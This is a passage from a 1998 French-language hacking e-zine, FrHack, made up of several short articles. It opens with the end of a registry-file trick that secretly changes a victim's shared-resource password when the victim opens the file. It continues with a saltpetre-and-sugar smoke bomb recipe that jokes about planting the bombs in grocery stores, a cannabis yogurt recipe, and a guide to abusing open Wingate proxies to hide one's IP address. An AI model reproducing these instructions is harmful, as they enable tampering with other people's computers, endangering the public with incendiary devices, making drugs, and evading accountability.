00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00 ; (note: remplacer C par la ressource partager) et comme valeur marque ce que vous avez ; noter quand vous avez noter le mot de passe de votre ressource parager ; je suis po sur si ca prend le paquet de 0 mais je manque de temps pour tester ; c'est p-e pas très clair mais en tout cas ca vous dit les principes de bases ; ----------< couper ici >--------------- Envoyer le fichier au gars, quand il l'ouvrira en double cliquant dessus ca va modifier son mot de passe de sa ressource partager Comme prochain article vous aurez un petit texte sur l'utilisation des .inf et peut-etre aussi un complement sur les .reg (j'ignore encore s'il va parraitre dans les emag de FrHack ou dans celui de TC (je leur ai promit un article)) J'espere que ce petit truc vous sera utile Utopiste (Utopiste@hotmail.com) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=- -=La Bombe fumogène=- ¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨ Le contenu de ce texte est à but informatif seulement et nous nous tenons pas responsable de l'usage que vous pouvez en faire. KneWoN Pour Réaliser la bombe fumogène,vous avez besoin de: -Salpêtre(*nitrate de sodium(ou potassium...)) /* de po -Sucre -Eau -Poêle(les ronds) -Plaque à buiscuits(plaque en métal) -Papier d'alluminium * :Je ne suis pas trop sur du nom scientifique du salpêtre. Étape #1:SE PROCURER DU SALPÊTRE Vous pouvez trouver ce produit chez toute bonne pharmacie(Jean c*utu).Je vous conseille d'acheter un pot de 125g(environ 5$ canadien). Étape #2:FAIRE LE MÉLANGE Prendre du salpêtre,pas trop,le mettre dans un bol avec du sucre(je ne sais pas exactement les doses...vous n'avez qu'à expérimenter et vous allez découvrir ce qui vous suffit;c'est pour celà que je vous conseille de commencer par de petites doses).Ajouter de l'eau(pas trop) pour former une pâte.Vous avez votre mélange. Étape #3:LA CUISSON Former une petite boite en papier d'aluminium dans laquelle vous déposez le mélange. Ouvrez les ronds de votre poele.Déposez la plaque à biscuits sur le rond.Mettre la boite d'aluminium contenant le mélange sur la plaque(au dessus du rond pour la meilleur cuisson et répartition). Attendre que le salpêtre devienne de couleur Beige jusqu'à Brun pâle(Surveillez bien ça car ça pourrait prendre en feu...).Fermer le rond et retirer la boite d'aluminium. Étape #4:LA TOUCHE FINALE Laisser sécher le tout.Pour des résultats rapides, vous pouvez le mettre dans le congélateur.Vous pouvez aussi enfoncer une mèche dans le mélange pendant qu'il est encore mou(dépendant des préférences). Étape #5:VOUS ÊTES PRÊTS? Votre bombe est maintenant prête.Il suffit de mettre feu à la croute ou à la mèche si vous en avez une. ATTENTION!!! Le feu yé pomal chaud...quand la bombe est pognée...ça fait fondre le papier d'aluminium. J'espère que celà vous a amusé et si jamais il y a des erreurs,informations complémentaires ou suggestions, n'hésitez pas à me contacter (#hack.fr sur undernet ou bin knewon@hotmail.com). Dernière recommandation...ne faites pas ça au four... Je sais de quoi je parle. Vous allez bien vous amuser si vous en placez dans les épiceries et les dépanneurs... hehe P.S.:Je vais surement écrire un texte complémentaire au sujet de fabrication de mèches artisanales. C'est purement hypothetique -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=- * Drugs * ( par MiStO ) (misto@bigfoot.com) Pour le premier numéro du zine de hack.fr j'ai décidé de vous lâcher la célèbre recette du SPACE YOGOURT... Ce qu'il vous faut réunir : - Un yogourt nature (0% de matière grasse pour les meufs :) - De l'huile de tournesol (huile végétale pour friture...) - Une grande cuillère - Un petit bol en terre cuite... - 2 grammes de résine de Cannabis La recette : Démouler le yogourt dans le bol, s'il y à de l'eau, égouttez-la. Effriter vos 2 grammes dans la cuillère (évitez de faire de trop grosses boulettes) puis mettez l'huile de tournesol par-dessus, jusqu'au quasi remplissage de la cuillère. Passer la cuillère sur la flamme d'une cuisinière (éviter le briquet). Attention ! Ça va devenir très chaud !!!! pour ne pas vous brûler tenez le manche de la petite cuillère avec une serviette. Quand l'huile commence à frémir plongez d'un coup sec la cuillère dans le bol contenant le yogourt. Remuez énergiquement. Dégustation : Ce Space Yogourt est parfait pour une personne, Ne pas le laissé reposer, dégustez-le de suite après l'avoir fait, Il sera tiède, à la bonne température... Le Space Yogourt est excellent nature mais pour ceux qui trouverait son goût un peu fade vous pouvez rajouter de petits morceaux de menthe fraîche. Effets : Sur le coup vous n'allez pas sentir grand chose, c'est pour cela que vous finirez le Space Yogourt, mais dans les 5 minutes qui suivront la dégustation vous allez ressentir comme une énorme claque qui va carrément vous scotcher à votre fauteuil !! vous ne pourrez pas bouger pendant environ 5 minutes, votre tête va se mettre à tourner à 160 km/h TOP fUN! :) une fois ces 5 minutes passées tout redeviendra normal ! puis toutes les demi-heures cela vous refera cet effet !!! Pendant environ 2 heures pour les initié et 6 heures pour les novices... Accoutumance au Cyber Yogourt ? : aucune. vOILA bon Hack et bonne défonce après :) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=- * Les Wingates * On entend souvent parler sur les channels de hack de wingate. Sous ce nom barbare, ce cache en fait la derniere technique a la mode pour masqué son adresse IP. 1) Qu'est ce qu'un wingate Un wingate est un programme residant tournant sous windows NT/95 qui permet a des machines de partager une conection modem, ce qui peut etre utile quand on possede plusieur ordi chez sois et que l'on a une large bande passante. Lors de l'installation de wingate sur une becane, les services suivant sont installé: port service 23 serveur proxie telnet installation standart 1080 serveur de SOCK installé en plus si on utilise gatekeeper 6667 proxie irc installé en plus si on utilise gatekeeper a) Le serveur proxie telnet Lors de l'installation, aucun mot de passe n'est demandé, ni une fois l'installation terminé, ce qui constitue une faiblesse. Cette abscence de mot de passe est la cause des probleme due a l'utilisation des wingates. L'utilisation de wingate est des plus aisé, exemple: * on effecue un telnet sur l'ip d'un wingate connue #telnet ip_du_wingate 23 * la on tombe sur un prompt du type: Wingate> * la on rentre la machine ou on veux se connecter: (le premier parametre est le l'adresse, la deuxième est le port) Wingate> 123.213.201.1 25 * et c finis ! Une autre methode permet utilisable sur l'irc est la suivante Dans la fenetre de status taper: /server l'ip_de_ta_wingate /raw eu.undernet.org 6667 /raw user nom_d'user U U : nom_reel /raw nick un_nickname * Comment trouver des wingate Pour trouver des wingate il suffit d'utiliser un domain scanner qui balaye les port 23. Si c un wingate le prompt Wingate> sera la et c bon. Un prog sert a ca, c'est wgatescan95-1_3.exe une autre facon est d'utiliser un domain scanneur sur le port 1080 pour trouver des port sock -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -= Conclusion =- (par Utopiste) Et voila, ceci était le premier emag de FrHack, nous esperons que vous avez aimé, nous comptons sortir un autre numéro le mois prochain 1 aout 1998, (si aucun d'entre nous se fait buster entre temps, mais la scene survit toujours a un bust, alors il devrai avoir un numéro en aout) Pour plusieurs d'entre nous il s'agit de notre premier emag, alors nous avons apprit sur le tas, et nous sommes pas mécontant du résultat, avant de finir je voudrai faire quelque remerciment: a tous le monde qui ont bosser sur ce emag et m'ont envoyer des articles, a la pizzeria du coin qui reste ouvert 24 heure sur 24 (super au retour d'en hacking/phreaking tour), au hackeur en général, au monde qui vienne sur #hack.fr et lui permette d,etre une place intéressante ou on peut parler en toute tranquillité, aussi un remerciment a tout les rebelle et révolutionnaire qui se batte pour la liberté individuele et a tous les autres que j'ai oublier de parler pis qui se sente d'accord avec ce mag. -= Pourkoi prédir le futur quand nous pouvons l'inventer ?? =- (Utopiste) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -= Commandite =- AUCUNE !!!